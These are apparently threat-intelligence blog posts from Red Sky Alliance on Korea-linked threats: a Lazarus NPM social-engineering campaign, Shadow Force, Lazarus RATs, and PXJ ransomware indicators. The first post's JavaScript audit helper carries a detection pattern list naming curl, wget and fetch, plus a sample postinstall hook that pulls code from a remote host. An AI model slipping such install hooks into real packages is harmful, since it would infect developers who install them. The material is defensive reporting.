korea - X-Industry - Red Sky Alliance | updated 2024-03-28T14:51:44Z | https://redskyalliance.org/xindustry/feed/tag/korea
Wanna Collab? Download this Malware | https://redskyalliance.org/xindustry/wanna-collab-download-this-malware | 2023-07-31T20:09:24.000Z | JD Thomason | https://redskyalliance.org/members/JDThomason
<div><p>The Lazarus Group is a North Korean state-sponsored cybercrime group, and they have been credited, in one way or another, with a recent social engineering campaign targeting developers on GitHub. They are said to have been created by the North Korean government as early as 2007, and they are part of the RGB (Reconnaissance General Bureau), North Korea’s primary foreign intelligence agency. “Lazarus Group” appears to be the group’s primary identity, but it has several aliases, including Appleworm, Group 77, Guardians of Peace, Hidden Cobra, and Jade Sleet, among others.</p>
<p>They target institutions in many areas, such as government, military, finance, manufacturing, and publishing, among many others. Their typical tactics include cyber espionage, data theft, heists, destructive malware, and, as we’ll see shortly, social engineering. They have been involved in a variety of malicious activities, such as the WannaCry 2.0 ransomware, which affected approximately 300,000 computers in at least 150 different countries, the 2014 attacks on Sony Pictures, and the theft of $81 million from Bangladesh Bank in 2016.</p>
<p>The social engineering campaign we’re focusing on here resembles another Lazarus campaign from January 2021, in which cybersecurity researchers were approached to collaborate on vulnerability exploit research and were served malicious Visual Studio projects. Social engineering can be thought of as the process of manipulating, influencing, or deceiving someone to obtain something like private information, restricted access, or valuables. Because they generally require some form of communication between attacker and victim, social engineering attacks are built around how people typically think and behave.</p>
<p>The goals of social engineering attacks will typically be either sabotage or theft. Common types of social engineering attacks found in the digital world can include things like phishing, baiting, physical breaches like tailgating, or scareware like a malicious antivirus ad giving a false report.</p>
<p>The attack cycle of a social engineering attack generally has four stages. First is preparation, where information is gathered on an individual target or a target group. Next is infiltration, where communication is started and trust is built. Exploitation occurs when the target’s weaknesses and trust align in a way that allows the attack to advance. Finally, the attacker disengages once the target has taken all of the required actions.</p>
<p>GitHub released a security alert detailing the specifics of this campaign and its attack chain on July 18th. The threat actors begin by impersonating developers or recruiters using accounts on GitHub and other social media sites. In some cases the accounts were fake, and in others they were compromised. Fake accounts linked to this campaign have been found on LinkedIn, Slack, and Telegram.</p>
<p>Developers in blockchain, cryptocurrency, online gambling, and cybersecurity are being targeted. After contact has been established, targets are invited into collaboration projects that contain malicious NPM package dependencies. These packages act as first-stage downloaders, which download and execute secondary malware. The projects themselves mostly appear to be either media players or cryptocurrency trading tools.</p>
<p>The NPM usage pattern exhibited by this campaign was first discovered by Phylum research in June 2023. They noted the sophistication of the technique, as the execution order of the packages used is crucial to the success of the infection. The attack is spread across a pair of ordered NPM packages: the first package fetches and stores a token from a remote server, which the second package then uses to obtain malicious code from a remote server.</p>
<p>In terms of mitigation, we can begin by noting that GitHub has listed a few indicators like domain names, malicious NPM packages, and malicious NPM accounts on their blog. The link to the mitigation blog post is here:</p>
<p><a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/</a></p>
<p>Anyone who was solicited by known malicious accounts is likely a target of this campaign. Repository invites can be reviewed in the GitHub security log. The events to look for are action:repo.add_member events, which indicate that you have accepted an invite to a repository. Think twice before accepting solicitations to collaborate on or install projects with NPM dependencies. Extra scrutiny should be given to new or recently published NPM dependencies, and to scripts that make network connections during installation. Anyone affected by these projects should inform their employer’s cybersecurity department, and it may also be prudent to reset or wipe affected devices, change account passwords, and rotate tokens stored on the affected devices.</p>
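<p>As an added example (not code from the Red Sky Alliance post or from GitHub), the review helper below puts the last mitigation into practice: it flags any npm lifecycle script (preinstall, install, postinstall, prepare) in a set of package manifests and rates higher the ones that appear to reach the network during installation. The package manifests embedded in it are constructed sample data, not the campaign’s packages, and the network-indicator pattern list is a heuristic chosen for this example.</p>

```javascript
// Lifecycle hooks npm runs automatically during "npm install".
const LIFECYCLE_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Heuristic indicators that an install script may download or execute remote
// content. Assumption for this example: not an exhaustive list.
const NETWORK_PATTERNS = [
  /\bcurl\b/i,
  /\bwget\b/i,
  /https?:\/\//i,
  /\bfetch\(/i,
  /require\(['"]https?['"]\)/i,
  /\bnode\s+-e\b/i,
];

// Inspect one parsed package.json object and return a finding per lifecycle
// hook it defines. A hook alone is "medium"; a hook with network indicators is "high".
function auditManifest(manifest) {
  const scripts = manifest.scripts || {};
  const findings = [];
  for (const hook of LIFECYCLE_HOOKS) {
    if (!Object.prototype.hasOwnProperty.call(scripts, hook)) continue;
    const body = String(scripts[hook]);
    const matched = NETWORK_PATTERNS.filter((re) => re.test(body)).map(String);
    findings.push({
      name: manifest.name || "(unnamed)",
      version: manifest.version || "(unknown)",
      hook,
      script: body,
      severity: matched.length > 0 ? "high" : "medium",
      matched,
    });
  }
  return findings;
}

// Audit a whole dependency tree (e.g. the parsed contents of every
// node_modules/*/package.json) and return findings with "high" first.
function auditDependencyTree(manifests) {
  const rank = { high: 0, medium: 1 };
  return manifests
    .flatMap(auditManifest)
    .sort((a, b) => rank[a.severity] - rank[b.severity]);
}

// Constructed sample manifests: one clean build-only package, one with a
// postinstall hook that pulls from a remote host, one with a plain preinstall hook.
const SAMPLE_MANIFESTS = [
  { name: "media-player-ui", version: "1.0.0", scripts: { build: "tsc", test: "jest" } },
  {
    name: "helper-lib-a",
    version: "0.0.3",
    scripts: {
      postinstall:
        "node -e \"require('https').get('https://example.invalid/t', r => r.pipe(process.stdout))\"",
    },
  },
  { name: "helper-lib-b", version: "0.0.1", scripts: { preinstall: "node scripts/setup.js" } },
];

// Stand-alone run: print the review list for the sample tree.
for (const f of auditDependencyTree(SAMPLE_MANIFESTS)) {
  console.log(`[${f.severity}] ${f.name}@${f.version} ${f.hook}: ${f.script}`);
}
```

Feed it the parsed package.json of each dependency before running an install; anything rated high deserves a read of the script and, ideally, a dry run with scripts disabled via npm's ignore-scripts setting.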
<p>In summary, the Lazarus Group is a North Korean state-sponsored cybercrime group said to have been operating as early as 2007. They have several aliases, like Jade Sleet and Guardians of Peace, and they operate in many areas, like government, military, and finance, among others.</p>
<p>Social engineering attacks aim to deceive someone in such a way that an attacker can obtain things like information or restricted access. Attacks like phishing or baiting are under the umbrella of social engineering, and a social engineering attack’s cycle will normally have four stages: preparation, infiltration, exploitation, and disengagement.</p>
<p>Developers on GitHub have been targeted in several different areas, including blockchain, cryptocurrency, online gambling, and cybersecurity, for the purpose of collaborating on projects like media players or cryptocurrency trading tools. These can contain malicious NPM package dependencies, which act as first-stage downloaders for additional malware.</p>
<p>Finally, we covered a few mitigation tips for this attack that were distributed by GitHub. They list known malicious accounts on their blog, and anyone who has collaborated with these accounts is likely a target. Users can review their security logs on GitHub to see if they have been added to any suspicious projects. Users should also take extra care when examining the package dependencies and installation scripts of a project, particularly if newer NPM packages are involved.</p>
<p><span style="font-size:8pt;">[1]: <a href="https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/">https://www.bleepingcomputer.com/news/security/github-warns-of-lazarus-hackers-targeting-devs-with-malicious-projects/</a></span></p>
<p><span style="font-size:8pt;">[2]: <a href="https://home.treasury.gov/news/press-releases/sm774">https://home.treasury.gov/news/press-releases/sm774</a></span></p>
<p><span style="font-size:8pt;">[3]: <a href="https://ofac.treasury.gov/recent-actions/20190913">https://ofac.treasury.gov/recent-actions/20190913</a></span></p>
<p><span style="font-size:8pt;">[4]: <a href="https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and">https://www.justice.gov/opa/pr/north-korean-regime-backed-programmer-charged-conspiracy-conduct-multiple-cyber-attacks-and</a></span></p>
<p><span style="font-size:8pt;">[5]: <a href="https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering">https://usa.kaspersky.com/resource-center/definitions/what-is-social-engineering</a></span></p>
<p><span style="font-size:8pt;">[6]: <a href="https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html">https://www.cmu.edu/iso/aware/dont-take-the-bait/social-engineering.html</a></span></p>
<p><span style="font-size:8pt;">[7]: <a href="https://www.imperva.com/learn/application-security/social-engineering-attack/">https://www.imperva.com/learn/application-security/social-engineering-attack/</a></span></p>
<p><span style="font-size:8pt;">[8]: <a href="https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains">https://github.blog/2023-07-18-security-alert-social-engineering-campaign-targets-technology-industry-employees/#domains</a></span></p>
<p><span style="font-size:8pt;">[9]: <a href="https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/">https://blog.phylum.io/sophisticated-ongoing-attack-discovered-on-npm/</a></span></p>
<p>Red Sky Alliance is a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the office directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a> </p>
<p>Weekly Cyber Intelligence Briefings:</p>
<ul>
<li>Reporting: https://www.redskyalliance.org/</li>
<li>Website: https://www.wapacklabs.com/</li>
<li>LinkedIn: https://www.linkedin.com/company/64265941</li>
</ul>
<p>REDSHORTS - Weekly Cyber Intelligence Briefings</p>
<p><a href="https://attendee.gotowebinar.com/register/5504229295967742989">https://attendee.gotowebinar.com/register/5504229295967742989</a></p></div>
Shadow Force | https://redskyalliance.org/xindustry/shadow-force | 2023-06-03T13:20:00.000Z | Bill Schenkelberg | https://redskyalliance.org/members/BillSchenkelberg
<div><p>The Shadow Force group is a threat group that has been active since 2013, targeting corporations and organizations in South Korea. Trend Micro published the first analysis report in September 2015, stating that a Korean media-related company had been attacked. In March 2020, AhnLab published an analysis report on Operation Shadow Force. It was introduced as a single campaign, since it was possible that the activity belonged to an existing threat group. However, no related threat group information has surfaced in the more than three (3) years since that report was released, so it appears to be a group active in Korea. In July 2022, KRCert published details of its analysis of the Shadow Force group’s additional breaches in its report <u>Analysis of Lateral Movement Strategies Using TTPs#7 SMB Admin Share</u>. In October 2022, AhnLab announced that the PE-modifying iatinfect.exe file was still being detected on an ongoing basis.</p>
<p>The report covers the changes made to the existing malware and the new malware discovered by tracking recent activities of the Shadow Force group. There are continued reports of file modification using iatinfect.exe, while the usage rate of the backdoor used in the past has decreased. Instead, there have been cases where other backdoors such as Viticdoor were used, and since December 2021 cryptocurrency miners have been installed alongside them. The threat actor has been using the same file names and similar malware and tools since 2014, making them easier to identify.</p>
<p>Link to the full AhnLab report on Shadow Force: <a href="{{#staticFileLink}}11244366094,original{{/staticFileLink}}">ATIP_2023_Shadow-Force-Groups-Viticdoor-and-CoinMiner.pdf</a></p>
<p><em>This article is presented at no charge for educational and informational purposes only.</em></p></div>
Lazarus Hackers Have New RATs | https://redskyalliance.org/xindustry/lazarus-hackers-have-new-rats | 2022-09-08T17:10:00.000Z | Jim McKee | https://redskyalliance.org/members/JimMcKee
<div><p>A malicious campaign mounted by the North Korea-linked Lazarus Group targets energy providers worldwide, including those based in the United States, Canada, and Japan.</p>
<p>The campaign is meant to infiltrate organizations worldwide to establish long-term access and subsequently exfiltrate data of interest to the adversary's nation-state, according to investigators. Some elements of the espionage attacks have already been reported in the media.</p>
<p>See: <a href="https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware">https://redskyalliance.org/xindustry/lazarus-group-is-back-with-more-malware</a></p>
<p>Symantec attributed the operation to a group referred to as Stonefly, a Lazarus subgroup better known as Andariel, Guardians of Peace, Operation Troy, and Silent Chollima. While these attacks previously led to the deployment of Preft (aka Dtrack) and NukeSped (aka Manuscrypt) implants, the latest attack wave is notable for employing two other pieces of malware: VSingle, an HTTP bot that executes arbitrary code from a remote network, and a Golang backdoor called YamaBot. Also used in the campaign is a new remote access trojan called MagicRAT, with capabilities to evade detection and launch additional payloads on infected systems. Although the same tactics have been applied in both attacks, the resulting malware implants have been distinct from one another, indicating the wide variety of implants at Lazarus’ disposal, according to researchers.<a href="#_ftn1">[1]</a></p>
<p>A C++-based implant, MagicRAT is designed to achieve persistence by creating scheduled tasks on the compromised system. It is also “rather simple” in that it provides the attacker with a remote shell to execute arbitrary commands and carry out file operations. MagicRAT can also launch additional payloads retrieved from a remote server on infected hosts. One of the executables retrieved from the command-and-control (C2) server takes the form of a GIF image file but in reality, is a lightweight port scanner. The C2 infrastructure associated with MagicRAT has been found harboring and serving newer versions of TigerRAT, a backdoor formerly attributed to Andariel, and is engineered to execute commands, take screenshots, log keystrokes, and harvest system information.</p>
<p>Also included in the latest variant is a USB Dump feature that allows the adversary to hunt for files with specific extensions, alongside laying the groundwork for implementing video capture from webcams. “The discovery of MagicRAT in the wild indicates Lazarus’ motivations to rapidly build new, bespoke malware to use along with their previously known malware such as TigerRAT to target organizations worldwide,” the researchers said.</p>
<p>Initial access into enterprise networks is facilitated by exploiting vulnerabilities in VMware products (e.g., Log4Shell), with the ultimate goal of establishing persistent access for activities supporting North Korean government objectives. The use of VSingle in one attack chain is said to have enabled the threat actor to carry out various activities such as reconnaissance, exfiltration, and manual backdooring, giving the operators a solid understanding of the victim environment.</p>
<p>Other tactics embraced by the group besides the use of such malware include credential harvesting via tools like Mimikatz and Procdump, disabling antivirus components, reconnaissance of Active Directory services, and even taking steps to clean up their traces after activating the backdoors on the endpoint.</p>
<p><a href="#_ftnref1">[1]</a> <a href="https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html">https://thehackernews.com/2022/09/north-korean-lazarus-hackers-targeting.html</a></p></div>
PXJ Ransomware Targeted Asia, France | https://redskyalliance.org/xindustry/pxj-ransomware-targeted-asia-france | 2020-03-19T14:25:25.000Z | Yury Polozov | https://redskyalliance.org/members/YuryPolozov
<div><p>A new ransomware strain called PXJ ransomware (also known as XVFXGW ransomware) was first discovered in late February 2020.<a>[1]</a> Half of the known samples were uploaded from Korea, and it uses a Korean website for C2, indicating predominantly Asian targeting.</p>
<p><strong>Details</strong></p>
<p>The earliest PXJ ransomware sample is from 24 February 2020. It received its name for the .pxj extension that it adds to the files it encrypts. Its alternative name, XVFXGW, refers to the strings in two contact emails (xvfxgw3929@protonmail.com, xvfxgw213@decoymail.com) and in the mutex that it creates (See the Indicators table below).</p>
<p>Prior to encryption, PXJ empties the Recycle Bin, deletes volume shadow copies and disables the Windows Error Recovery service. Then PXJ uses both AES and RSA algorithms to lock data down.<a>[2]</a></p>
<p>Figure 1. PXJ ransom note stored in LOOK.txt <a>[3]</a></p>
<p>Red Sky Alliance detected C2 communication with a Korean site (pediitn[.]co[.]kr) co-hosted on a Korean IP. Hackers likely temporarily compromised this domain, belonging to a Korean pedicure company, and secretly hosted a malicious .php page within the site. </p>
<p>Half of the samples were submitted from Korea, as well as one from China, and one from France. Red Sky Alliance will continue to monitor if PXJ ransomware will become a larger threat.</p>
<p><strong>Indicators</strong></p>
<table width="624">
<tbody>
<tr>
<td width="229">
<p>Indicator</p>
</td>
<td width="52">
<p>Type</p>
</td>
<td width="66">
<p>Kill_Chain_Phase</p>
</td>
<td width="66">
<p>First_Seen</p>
</td>
<td width="66">
<p>Last_Seen</p>
</td>
<td width="72">
<p>Comments</p>
</td>
<td width="74">
<p>Attribution</p>
</td>
</tr>
<tr>
<td width="229">
<p>http[://]pediitn[.]co[.]kr/bbs/do.php?token_value=syajidiwmjavmy8xnca5ojq3ojmxiakgqu5btfltvdatmkqxnjcxiakgqufbqkfosxg5m1jkdwzpna==</p>
</td>
<td width="52">
<p>URL</p>
</td>
<td width="66">
<p>C2</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>03/17/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>SyAJIDIwMjAvMy8xIDM6NTg6NTggCSBpY2Z3cmhpIAkgQUFBQkFOSXg5M1JkdWZPNA</p>
</td>
<td width="52">
<p>String</p>
</td>
<td width="66">
<p>C2</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p>Token_value</p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>syajidiwmjavmy8xidm6ntk6mzggcsbbtkfmwvnumc0yrde2nzegcsbbqufcqu5jedkzumr1zk80</p>
</td>
<td width="52">
<p>String</p>
</td>
<td width="66">
<p>C2</p>
</td>
<td width="66">
<p>03/01/2020</p>
</td>
<td width="66">
<p>03/01/2020</p>
</td>
<td width="72">
<p>Token_value</p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>XVFXGW DOUBLE SET</p>
</td>
<td width="52">
<p>String</p>
</td>
<td width="66">
<p>Exploitation</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>03/17/2020</p>
</td>
<td width="72">
<p>Mutexes Created</p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>64fdcb90411440bc44970d1ecce60686b85df54ed552abf312947207ea654dce</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>Delivery</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>c5697c0166f9b18ee157bcdde9fb2f531892d62076b4fa3664adf0065598ebf7</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>Delivery</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>9a4e4211f7e690ee4a520c491ef7766dcf1cc9859afa991e15538e92b435f3a1</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>Delivery</p>
</td>
<td width="66">
<p>02/24/2020</p>
</td>
<td width="66">
<p>02/24/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>58673f5c9344f510703ffda908c7e7830f36905015529ab629479c6bf44236e9</p>
</td>
<td width="52">
<p>SHA256</p>
</td>
<td width="66">
<p>NA</p>
</td>
<td width="66">
<p>02/25/2020</p>
</td>
<td width="66">
<p>02/29/2020</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>xvfxgw3929@protonmail.com</p>
</td>
<td width="52">
<p>Email</p>
</td>
<td width="66">
<p>Actions and Objectives</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
<tr>
<td width="229">
<p>xvfxgw213@decoymail.com</p>
</td>
<td width="52">
<p>Email</p>
</td>
<td width="66">
<p>Actions and Objectives</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="66">
<p>03/19/2019</p>
</td>
<td width="72">
<p> </p>
</td>
<td width="74">
<p>PXJ Ransomware</p>
</td>
</tr>
</tbody>
</table>
<p>Red Sky Alliance partners with Cysurance to protect you from the PXJ ransomware and other cyber risks by supplementing security technology with robust cyber insurance.</p>
<p>Red Sky Alliance is in New Boston, NH. We are a Cyber Threat Analysis and Intelligence Service organization. For questions, comments or assistance, please contact the lab directly at 1-844-492-7225, or <a href="mailto:feedback@wapacklabs.com">feedback@wapacklabs.com</a></p>
<p>Serial: IR-20-078-001</p>
<p>Country: KR, CN, FR</p>
<p>Report Date: 20200318</p>
<p>Industries: All</p>
<p><a>[1]</a> Primary analysis from IBM X-Force IRIS</p>
<p><a>[2] </a>securityintelligence.com/posts/pxj-ransomware-campaign-identified-by-x-force-iris/</p>
<p><a>[3]</a> twitter.com/Amigo_A_/status/1232221881002057728</p></div>